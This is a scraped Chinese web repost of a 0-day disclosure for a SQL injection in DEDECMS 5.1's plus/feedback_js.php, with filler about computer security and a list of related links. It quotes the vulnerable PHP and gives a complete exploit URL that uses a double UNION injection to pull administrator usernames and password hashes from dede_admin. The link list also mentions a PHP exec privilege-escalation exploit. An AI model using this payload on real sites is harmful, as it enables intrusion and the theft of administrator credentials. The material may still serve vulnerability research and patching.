php5.1 0day,DEDECMS 5.1 feedback_js.php 0DAY
软件安装:装机软件必备包
随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁。
作者:st0p&Rainy'Fox
同样是在magic_quotes_gpc=off的情况下可用
漏洞版本:DEDECMS 5.1
此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl
......
$urlindex = 0;
if(empty($arcID))
{
$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
//此处$arcurl没有过滤
if(is_array($row)) $urlindex = $row['id'];
//存在结果则把$urlindex赋值为查询到的$row['id'],我们可以构造SQL语句带入下面的操作中了
}
if(empty($arcID) && empty($urlindex)) exit();
//如果$arcID为空或$urlindex为空则退出
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
//我们让$arcID为空,刚才上面执行的结果就会被赋值给$wq带入下面的操作中执行了.
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
看一下利用方法吧,嘿,为了闭合我用了两次union
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 as msg from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
javascript:contentimage(this);>
唉,偶和Rainy'Fox这家伙找目标测试的时候,他竟然说能不能在magic_quotes_gpc=on时通过....这种想法太YD了..也太可怕了,要真可以实现,这个网络界又该乱了,好多程序都是在PHP默认magic_quotes_gpc为关闭时才会调用自身的转义部分...要真能实现,那就是PHP程序的恶梦了...
上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。
软件推荐:
php5.1 0day,DEDECMS 5.1 feedback_js.php 0DAY相关推荐
- php keep user login,php5.4安装dedecms登录后台空白解决办法(session_register函数已废弃)...
本地安装dedecms5.7登录后台空白,找了原因,原来是session_register函数已经被php5.4废弃的原因. ------------------------------------- ...
- 软件本地化团队 - 〖0day 资源〗 - 2006.06.03 0day
软件本地化团队 -> [0day 资源] -> 2006.06.03 0day 登录 -> 注册 -> 回复主题 -> 发表主题 kfm 2006-06-03 22:39 ...
- dedecms注入漏洞feedback.php,织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
影响版本: DEDECMS 5.1漏洞描述: 同样是在magic_quotes_gpc=off的情况下可用 此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.p ...
- 矩阵对抗与系统补丁200911(第2期)下载
矩阵对抗与系统补丁200911(第2期) http://down.51cto.com/data/51768 (51cto下载站地址) 主要支持单位: 51CTO安全频道 51CTO互动中心 有关微软和 ...
- dedecms php5.4 无法退出后台,解决更换PHP5.4以上版本后Dedecms后台登录空白问题的方法...
为什么会出现更换PHP5.4以上版本后Dedecms后台登录空白的情况,本文将给大家详细分析,找出真正原因以及解决办法. 把PHP的版本从5.2.14升到了5.4.15,升级完后dedecms后台却打 ...
- 从PDO下的SQL注入思路到获得GIT 3000star项目0day
0x01 PDO简介 PDO全名PHP Data Object PDO扩展为PHP访问数据库定义了一个轻量级的一致接口.PDO提供了一个数据访问抽象层,这意味着,不管使用哪种数据库,都可以使用相同的函 ...
- 虚拟专题:知识图谱 | 基于网络防御知识图谱的0day攻击路径预测方法
来源:网络与信息安全学报 基于网络防御知识图谱的0day攻击路径预测方法 孙澄, 胡浩, 杨英杰, 张红旗 信息工程大学 摘要:针对 0day 漏洞未知性造成的攻击检测难问题,提出了一种基于知识图谱的 ...
- php5.4漏洞解决,php5.4.3的远程代码执行漏洞,提权挺管用
PHP com_print_typeinfo()的漏洞,通过PHP代码调用"exec"可运行SHELL命令 用这个提权是不是很方便了? // Exploit Title: PHP ...
- 谷歌紧急修复已遭在野利用的0day
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 摘要 谷歌发布 Windows.Mac 和 Linux 版本的 Chrome 100.0.4896.127,修复已遭利用的高危0day漏洞(CV ...
最新文章
- 让你爽到飞起的【懒人插件AutoScssStruct4Vue】VSCode根据template的标签目录一键生成SCSS/LESS结构,敏捷开发必备插件!!!
- Oracle CDC (Change Data Capture)更新数据捕获——概述
- CentOS 7.6安装OpenMPI3.1.0
- (Shadow,Gradient)
- oracle数据库实现不同数据库之间的表格数据定期同步
- HTML5做手机站页面字体显示很小的解决方法
- 不管服不服 Windows仍是全球第一大桌面系统
- 广西农产品(广州)交易会 农业大健康·林裕豪:签约农商对接
- Linux之du df free:du文件大小 df分区使用 free内存
- 基于Jenkins + Tomcat 的安卓客户端可持续化构建及发布下载(loltube.cn)
- eppp如何导入php文件_PHP如何处理文件权限?(代码示例)
- 防火墙、防病毒网关、IDS以及该类安全产品开发
- JS中的innerHTML和outerHTML区别
- 【单片机基础篇】共阴级四位数码管
- 理解Mybatis一级缓存,以及如何真正使用到一级缓存
- 线性密码分析(简单笔记)
- 一定不要想当然啊!!
- 优酷视频APP的缓存视频在哪里
- CSS隐藏滚动条并可以滚动内容
- 5G的NSA和SA,到底啥意思?
热门文章
- eigen3.3.8帮助文档下载 chm_MAXHUB文档v1.10.1-MAXHUB文档电脑版下载
- wcf简单教程(10) ajax调用,wcf简单教程(10) ajax调用
- 南邮 Android 课程设计,南邮大四课程设计.doc
- input change获取改变之前的值和改变之后的值_使用Vue3.0新特性造轮子 WidgetUI3.0 (Input输入框组件)
- python正则表达式指南_Python正则表达式指南
- input自适应_【正点原子FPGA连载】第十一章基于OV5640的自适应二值化实验-领航者ZYNQ之HLS 开发指南...
- android控件拖动,移动、解决父布局重绘时控件回到原点
- Spring Boot Starters 列表
- Python基础--1.2 变量循环基础介绍
- python之常见报错整理